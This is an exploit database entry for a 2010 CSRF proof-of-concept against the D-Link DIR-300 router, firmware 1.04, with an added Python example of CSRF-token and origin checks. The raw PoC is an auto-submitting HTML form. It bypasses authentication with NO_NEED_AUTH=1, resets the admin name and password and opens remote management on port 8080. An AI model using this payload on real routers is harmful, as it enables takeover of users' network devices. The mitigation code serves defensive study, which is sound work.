Vendor: DIR-300
By: outlaw.dll
CVSS: 6,8 (MEDIUM)
CWE: 352, Cross-Site Request Forgery (CSRF)
Product Name: DIR-300
Affected Version From: 1.04
Affected Version To: 1.04
Patch Exists: NO
Related CWE: N/A
CPE: h:d-link:dir-300
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
Year: 2010

D-Link DIR-300 CSRF Vuln. (Change Admin Account Settings) PoC Exploit

This PoC exploit enables remote management for a specific IP address on the D-Link DIR-300 router with firmware version 1.04. The administrator does not need to be logged in. The exploit was tested on Windows 7 Ultimate with Google Chrome, but will work on any other OS.

Mitigation:

Implementing CSRF protection mechanisms, such as anti-CSRF tokens, can help mitigate the risk of CSRF attacks.
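
The mitigation above, shown as an added Python example that is not from the original entry or from D-Link firmware: a check for a settings handler that rejects the PoC's request for three independent reasons (no session, foreign origin, no token). The function names, the `csrf_token` field, the session id and the `other-site.example` origin are assumptions; the host `server` and the form field names come from the PoC form in the raw data.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: a per-device secret created at boot (not taken from D-Link firmware).
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Token bound to one admin session, sent as a hidden field in the settings form."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_admin_post(host, headers, session_id, form):
    """Return the reasons to reject a state-changing POST; an empty list means accept."""
    reasons = []
    # Authentication is decided by the server-side session only. Query-string
    # hints such as NO_NEED_AUTH=1 in the PoC URL are never consulted.
    if session_id is None:
        reasons.append("no authenticated session")
    # A form auto-submitted from another site carries that site's Origin/Referer.
    source = headers.get("Origin") or headers.get("Referer")
    if source is None or urlsplit(source).netloc != host:
        reasons.append("cross-origin or missing Origin/Referer")
    # The token cannot be read or guessed by a page on another origin.
    supplied = form.get("csrf_token", "").encode()
    expected = issue_csrf_token(session_id).encode() if session_id else b""
    if not expected or not hmac.compare_digest(supplied, expected):
        reasons.append("missing or invalid CSRF token")
    return reasons


def demo():
    """Constructed requests: host 'server' and the field names follow the PoC form."""
    poc_fields = {"ACTION_POST": "1", "rt_enable_h": "1", "rt_port": "8080"}
    cross_site = {"Origin": "http://other-site.example"}  # constructed origin
    same_site = {"Origin": "http://server"}
    legit = dict(poc_fields, csrf_token=issue_csrf_token("sess-1"))
    return (
        check_admin_post("server", cross_site, None, poc_fields),      # PoC as published
        check_admin_post("server", cross_site, "sess-1", poc_fields),  # admin logged in
        check_admin_post("server", same_site, "sess-1", legit),        # real settings form
    )


if __name__ == "__main__":
    for outcome in demo():
        print(outcome or "accepted")
```
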

Exploit-DB raw data:

<!--

[+] Title: D-Link DIR-300 CSRF Vuln. (Change Admin Account Settings) PoC Exploit
[+] Description: Enable Remote Management for specific IP
[+] Firmware Version: 1.04
[+] Note: No need for administrator to be logged in (:
[+] Author: outlaw.dll
[+] Date: 17.12.2010
[+] Tested on: Windows 7 Ultimate (Google Chrome) but will work in any other OS

This firmware version is full of CSRF and other type of vulnerabilities.
W_o.O_W

-->
<form name="exploit" action="http://server/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" method="post">
        <input type="hidden" name="ACTION_POST" value="1" />
        <input type="hidden" name="admin_name" value="outlaw.dll" />
        <input type="hidden" name="admin_password1" value="1337" />
        <input type="hidden" name="admin_password2" value="1337" />
        <input type="hidden" name="rt_enable_h" value="1" />
        <input type="hidden" name="rt_port" value="8080" />
        <input type="hidden" name="rt_ipaddr" value="192.168.0.1337" />
</form>
<script>document.exploit.submit();</script>